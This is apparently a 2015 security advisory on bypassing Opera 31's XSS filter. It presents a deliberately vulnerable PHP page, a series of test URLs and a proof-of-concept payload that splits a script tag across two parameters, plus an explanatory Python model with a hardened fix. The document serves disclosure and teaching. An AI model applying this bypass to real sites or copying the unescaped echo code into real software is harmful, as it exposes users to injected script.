Opera 31.0.1889.174 XSS Filter Bypass



EKU-ID: 5075 CVE: OSVDB-ID:
Author: Mahdi.Hidden Published: 2015-09-01 Verified: Verified


# Exploit Title: Opera 31.0.1889.174 XSS Filter Bypass
# Exploit Author: Mahdi.Hidden
# Vendor Homepage : http://www.opera.com/
# Software Link: http://www.opera.com/computer/thanks?ni=stable&os=windows
# Version: 31.0.1889.174
# Date: 2015-08-28
# Tested on: Windows

# Description
# Reflected XSS occurs when a server-side script (here, a PHP script) echoes a
request parameter straight into the page without filtering or encoding it. The
flaw is very common in web applications, and many sites have it. Because the
injected payload is almost always JavaScript, browsers ship an XSS filter: it
looks for script in the URL query string and in HTTP POST bodies, and when the
same script is reflected in the response it refuses to execute it. The filter
can, however, be bypassed in several ways. Here is the one I found.

# Full Explanation
# Opera is a widely used browser, so Opera has to keep its users secure. One of
its protections is the Anti-XSS filter, which stops reflected JavaScript from
executing. Today I am going to bypass it.

# First, make a vulnerable PHP file (e.g. opera.php). Both parameters are
echoed without htmlspecialchars() or any other encoding, which is what makes
the page vulnerable to reflected XSS:
<?php
// Echo the value of parameter one, unescaped (deliberately vulnerable)
echo "This is text1:".$_GET['text1']."<br><br>";

// Echo the value of parameter two, unescaped (deliberately vulnerable)
echo "This is text2:".$_GET['text2']."<br><br>";
?>

# Next, test a simple XSS payload like this:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/)</script>&text2=ashiayne

# The script appears in the page source, but you get no alert. If you open the
source viewer you will see the reflected code marked with a red highlight:
Opera's XSS filter has caught it. Other single-parameter payloads give the same
result.

# OK, let's try a <script> tag without its closing </script>:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/)&text2=ashiayne

# Again the code is reflected, this time without any red highlight, but still
nothing runs: the script element is never closed, so the browser never gets to
the end tag that would make it execute the script.

# Well, let's put the closing tag in parameter 2:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/)&text2=</script>

# Now the code is reflected without any red highlight, but there is still no
alert. Look at what the PHP emits between the two tags: the script body is
alert(/XSS/)<br><br>This is text2: which is not valid JavaScript, so the script
fails to parse and nothing runs.

# So let's use quoting to turn the non-code text that lands between the two
parameters into a string literal. Take void(''): put void(' at the end of
parameter one and close it with ') at the start of parameter two:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/);void('&text2=')</script>

# You will see the alert! The reflected script body is now
alert(/XSS/);void('<br><br>This is text2:') which is valid JavaScript, and the
filter does not catch it, apparently because no single parameter contains a
complete <script>...</script> element. Instead of void('') you can use
document.write('') or any other call that takes a string argument.

# For example:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/);document.write('&text2=')</script>

# POC:
http://[HOSTNAME]/[PATH]/opera.php?text1=<script>alert(/XSS/);void('&text2=')</script>

# Payload:
?text1=<script>alert(/XSS/);void('&text2=')</script>
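To make the four requests above reproducible offline, here is an added Python model written for this edit (it is not part of the original advisory and not Opera's code). It mirrors the page's opera.php, extracts every complete script element from the reflected response, and applies a deliberately simplified filter rule (an assumption for illustration, not Opera's real algorithm) that neuters a script element only when the whole element is reflected verbatim from a single request parameter. It also renders a hardened variant that HTML-encodes the parameters, the fix the PHP file is missing. The hostname example.test is a placeholder.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# A complete <script>...</script> element; group 1 is the JavaScript body.
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def parse_query(url):
    """Split the query string on '&' only. parse_qs is avoided on purpose:
    older Python versions also split on ';', which the payload contains."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key)] = unquote(value)
    return params


def render_vulnerable(params):
    """Same markup as the advisory's opera.php: both values echoed as-is."""
    return ("This is text1:" + params.get("text1", "") + "<br><br>"
            + "This is text2:" + params.get("text2", "") + "<br><br>")


def render_hardened(params):
    """What opera.php should do: HTML-encode each value before echoing it
    (PHP equivalent: htmlspecialchars($v, ENT_QUOTES, 'UTF-8'))."""
    def enc(name):
        return html.escape(params.get(name, ""), quote=True)
    return ("This is text1:" + enc("text1") + "<br><br>"
            + "This is text2:" + enc("text2") + "<br><br>")


def script_bodies(markup):
    """JavaScript source of every complete script element in the page."""
    return SCRIPT_RE.findall(markup)


def filter_verdict(params, markup):
    """Simplified reflected-XSS filter (an assumption for illustration, not
    Opera's real algorithm): a script element is neutered only when the
    entire element appears verbatim inside one request parameter value."""
    for match in SCRIPT_RE.finditer(markup):
        if any(match.group(0) in value for value in params.values()):
            return "neutered"
    return "untouched"


def analyse(url, hardened=False):
    """Render the request and report the script bodies and filter verdict."""
    params = parse_query(url)
    render = render_hardened if hardened else render_vulnerable
    markup = render(params)
    return {"bodies": script_bodies(markup),
            "verdict": filter_verdict(params, markup)}


BASE = "http://example.test/opera.php"  # placeholder host, not a real target
REQUESTS = [  # the four requests from the write-up, in order
    "?text1=<script>alert(/XSS/)</script>&text2=ashiayne",
    "?text1=<script>alert(/XSS/)&text2=ashiayne",
    "?text1=<script>alert(/XSS/)&text2=</script>",
    "?text1=<script>alert(/XSS/);void('&text2=')</script>",
]

if __name__ == "__main__":
    for query in REQUESTS:
        print(query, "->", analyse(BASE + query))
    print("hardened ->", analyse(BASE + REQUESTS[-1], hardened=True))
```

Running it shows the progression the write-up describes: the first request yields one script element that sits wholly inside text1 and is neutered; the second has no closed element at all; the third has a closed element whose body is not valid JavaScript; the fourth has a closed element with a valid body that no single parameter contains. With the hardened renderer the same payload produces no script element, because the angle brackets arrive as &lt; and &gt;.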

# Thanks.
# Mahdi.Hidden
# Ashiyane Digital Security Team